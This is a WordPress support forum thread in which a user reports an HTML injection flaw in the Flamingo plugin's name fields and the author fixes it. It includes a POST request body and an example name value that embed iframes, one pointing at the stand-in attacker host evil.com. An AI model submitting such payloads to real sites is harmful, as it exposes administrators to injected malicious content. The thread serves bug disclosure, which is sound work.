Title: Code injection
Last modified: August 21, 2016

---

# Code injection

 *  Resolved [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/)
 * Hey guys, you have code injection on the first and last name values that when
   viewed in address book or in the inbound messages render the code
 * _wpcf7=7&_wpcf7_version=3.8.1&_wpcf7_locale=en_US&_wpcf7_unit_tag=wpcf7-f7-p5-
   o1&_wpnonce=31337&FirstName=Evil%3Ciframe+src%3D%22http%3A%2F%2Fwww.google.com%
   22%3E&Surname=Dude%3Ciframe+src%3D%22http%3A%2F%2Fwww.google.com%22%3E&AgeRange
   =18+to+25&Email=evil@dude.com
 * [https://wordpress.org/plugins/flamingo/](https://wordpress.org/plugins/flamingo/)

Viewing 6 replies - 1 through 6 (of 6 total)

 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974137)
 * Can you be more specific? What is it?
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974146)
 * It’s code injection, the specifics are in the post request I submitted above
 * I’m not sure what your having trouble with mate.
 * [https://www.owasp.org/index.php/Code_Injection](https://www.owasp.org/index.php/Code_Injection)
 * if someone supplies html / code in the name fields, when the admin is viewing
   the submissions it will render the user supplied code.
 * badguy submits his name as ‘MrEvil <iframe src=”[http://evil.com/”>&#8217](http://evil.com/”>&#8217);
 * when admin or manager of that plug in reviews the submissions it will treat the
   <iframe as legitimate code and render it, if evil.com has malicious payloads (
   java,javascript,flash metasploit whatever, it will get pushed in via iframe attacking
   authenticated users)
 * … do you need a video ?
 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974201)
 * > the specifics are in the post request I submitted above
 * Do you mean HTTP POST request?
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974202)
 * Oh sorry, are there any other types of post requests ?
 * yes I mean HTTP POST
 *  Plugin Author [Takayuki Miyoshi](https://wordpress.org/support/users/takayukister/)
 * (@takayukister)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974216)
 * Thank you very much. There were some fields not escaped properly. Fixed them 
   and released v1.1.1.
 *  Thread Starter [n0x00](https://wordpress.org/support/users/n0x00/)
 * (@n0x00)
 * [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974217)
 * wicked! that’s probably the quickest turn around I’ve seen to date 🙂
 * good work!

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘Code injection’ is closed to new replies.

 * ![](https://ps.w.org/flamingo/assets/icon-128x128.png?rev=1540977)
 * [Flamingo](https://wordpress.org/plugins/flamingo/)
 * [Support Threads](https://wordpress.org/support/plugin/flamingo/)
 * [Active Topics](https://wordpress.org/support/plugin/flamingo/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/flamingo/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/flamingo/reviews/)

 * 6 replies
 * 2 participants
 * Last reply from: [n0x00](https://wordpress.org/support/users/n0x00/)
 * Last activity: [12 years ago](https://wordpress.org/support/topic/code-injection-3/#post-4974217)
 * Status: resolved